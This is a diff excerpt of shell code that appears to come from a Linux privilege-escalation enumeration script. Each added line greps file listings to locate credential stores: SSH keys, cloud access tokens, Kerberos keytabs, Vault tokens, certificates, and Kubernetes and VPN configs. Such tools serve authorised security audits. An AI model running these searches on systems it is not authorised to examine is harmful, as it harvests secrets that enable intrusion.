+ PSTORAGE_HOSTAPD=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/etc" | grep -E "system-connections$" | sort | uniq | head -n 70)
+ PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/etc" | grep -E "pam\.d$" | sort | uniq | head -n 70)
+ PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/etc" | grep -E "exports$" | sort | uniq | head -n 70)
+ PSTORAGE_GLUSTERFS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "glusterfs\.pem$|glusterfs\.ca$|glusterfs\.key$" | sort | uniq | head -n 70)
+ PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70)
+ PSTORAGE_RACOON=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70)
+ PSTORAGE_KUBERNETES=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "kubeconfig$|kubelet-kubeconfig$|psk\.txt$|\.kube.*$|kubelet$|kube-proxy$|kubernetes$" | sort | uniq | head -n 70)
+ PSTORAGE_VNC=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70)
+ PSTORAGE_LDAP=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "ldap$" | sort | uniq | head -n 70)
+ PSTORAGE_LOG4SHELL=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/bin|^/media|^/snap|^/cdrom|^/tmp|^/mnt|^/private|^/sbin|^/srv|^/applications|^/lib|^$GREPHOMESEARCH|^/opt|^/usr|^/lib32|^/.cache|^/etc|^/var|^/lib64" | grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70)
+ PSTORAGE_OPENVPN=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70)
+ PSTORAGE_SSH=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70)
+ PSTORAGE_CERTSB4=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70)
+ PSTORAGE_CERTSBIN=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70)
+ PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70)
+ PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70)
+ PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70)
+ PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70)
+ PSTORAGE_KERBEROS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "krb5\.conf$|.*\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_KIBANA=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70)
+ PSTORAGE_KNOCKD=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70)
+ PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "logstash$" | sort | uniq | head -n 70)
+ PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70)
+ PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70)
+ PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.vault-token$" | sort | uniq | head -n 70)
+ PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "couchdb$" | sort | uniq | head -n 70)
+ PSTORAGE_REDIS=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "redis\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_MOSQUITTO=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "neo4j$" | sort | uniq | head -n 70)
